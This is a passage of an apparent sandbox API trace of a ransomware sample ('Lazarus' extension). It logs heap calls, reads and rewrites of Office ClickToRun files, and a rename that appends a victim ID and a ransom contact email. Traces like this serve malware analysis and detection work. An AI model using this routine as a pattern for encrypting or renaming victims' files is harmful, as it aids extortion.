| out: hHeap=0x20000) returned 1 [0079.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0079.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0079.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0079.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0079.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0079.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0079.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0079.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0079.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0079.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0079.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0079.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0079.456] AreFileApisANSI () returned 1 [0079.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0079.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x2e430 [0079.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe") returned 78 [0079.456] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80cbb8b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80cbb8b2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb7179d00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x5b1068)) returned 1 [0079.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0079.456] AreFileApisANSI () returned 1 [0079.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0079.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0079.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0079.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0079.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0079.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0079.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0079.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0079.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0079.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0079.457] GetLastError () returned 0x0 [0079.457] SetLastError (dwErrCode=0x0) [0079.457] AreFileApisANSI () returned 1 [0079.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0079.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x2e430 [0079.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe") returned 78 [0079.457] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0079.457] GetFileType (hFile=0x430) returned 0x1 [0079.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0079.457] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0079.457] ReadFile (in: hFile=0x430, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0079.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x93468 [0079.459] ReadFile (in: hFile=0x430, lpBuffer=0x93468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x93468*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0079.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d720 [0079.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6d8 [0079.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df88 [0079.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x94470 [0079.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b8b0 [0079.461] GetLastError () returned 0x0 [0079.461] SetLastError (dwErrCode=0x0) [0079.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0079.461] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0079.461] WriteFile (in: hFile=0x430, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0079.462] WriteFile (in: hFile=0x430, lpBuffer=0x93468*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x93468*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0079.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x93468 | out: hHeap=0x20000) returned 1 [0079.462] CloseHandle (hObject=0x430) returned 1 [0080.865] AreFileApisANSI () returned 1 [0080.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0080.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x2e430 [0080.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe") returned 78 [0080.865] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0080.865] GetFileType (hFile=0x430) returned 0x1 [0080.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0080.865] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0080.865] ReadFile (in: hFile=0x430, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0080.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0080.866] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0080.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e2d0 [0080.867] GetLastError () returned 0x0 [0080.867] SetLastError (dwErrCode=0x0) [0080.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0080.867] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0080.867] WriteFile (in: hFile=0x430, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0080.868] WriteFile (in: hFile=0x430, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0080.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0080.868] CloseHandle (hObject=0x430) returned 1 [0081.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0081.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8f) returned 0x8a5c8 [0081.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0081.806] AreFileApisANSI () returned 1 [0081.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0081.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x2e430 [0081.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe") returned 78 [0081.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a5c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 140 [0081.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x118) returned 0x92138 [0081.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a5c8, cbMultiByte=-1, lpWideCharStr=0x92138, cchWideChar=140 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 140 [0081.807] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0081.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x92138 | out: hHeap=0x20000) returned 1 [0081.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0081.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0081.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6d8 | out: hHeap=0x20000) returned 1 [0081.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d720 | out: hHeap=0x20000) returned 1 [0081.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x94470 | out: hHeap=0x20000) returned 1 [0081.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b8b0 | out: hHeap=0x20000) returned 1 [0081.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0081.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0081.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0081.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0081.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0081.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0081.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.808] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d07d85, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d07d85, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb7179d00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0xf34d8, dwReserved0=0xa6664339, dwReserved1=0x5be09306, cFileName="OfficeC2RCom.dll", cAlternateFileName="OFFICE~1.DLL")) returned 1 [0081.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0081.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0081.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0081.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0081.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0081.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0081.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0081.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0081.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0081.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0081.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0081.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0081.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0081.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0081.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0081.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0081.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0081.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0081.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0081.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0081.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0081.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0081.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0081.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0081.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0081.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0081.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0081.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0081.809] AreFileApisANSI () returned 1 [0081.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll", lpUsedDefaultChar=0x0) returned 75 [0081.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0081.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.809] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0081.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0081.809] AreFileApisANSI () returned 1 [0081.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0081.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85620 [0081.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x85620, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll") returned 75 [0081.809] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rcom.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0081.810] GetFileType (hFile=0x430) returned 0x1 [0081.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85620 | out: hHeap=0x20000) returned 1 [0081.810] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0081.810] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0081.810] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0081.810] CloseHandle (hObject=0x430) returned 1 [0081.810] AreFileApisANSI () returned 1 [0081.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0081.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x851c0 [0081.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x851c0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll") returned 75 [0081.810] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rcom.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0081.811] GetFileType (hFile=0x430) returned 0x1 [0081.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x851c0 | out: hHeap=0x20000) returned 1 [0081.811] CloseHandle (hObject=0x430) returned 1 [0081.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0081.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0081.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0081.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0081.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0081.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0081.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0081.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0081.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0081.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0081.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0081.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0081.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0081.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0081.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0081.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0081.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0081.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0081.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0081.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0081.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0081.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0081.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0081.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0081.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0081.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0081.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0081.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0081.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0081.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0081.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0081.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0081.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0081.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0081.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0081.812] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0081.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0081.812] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 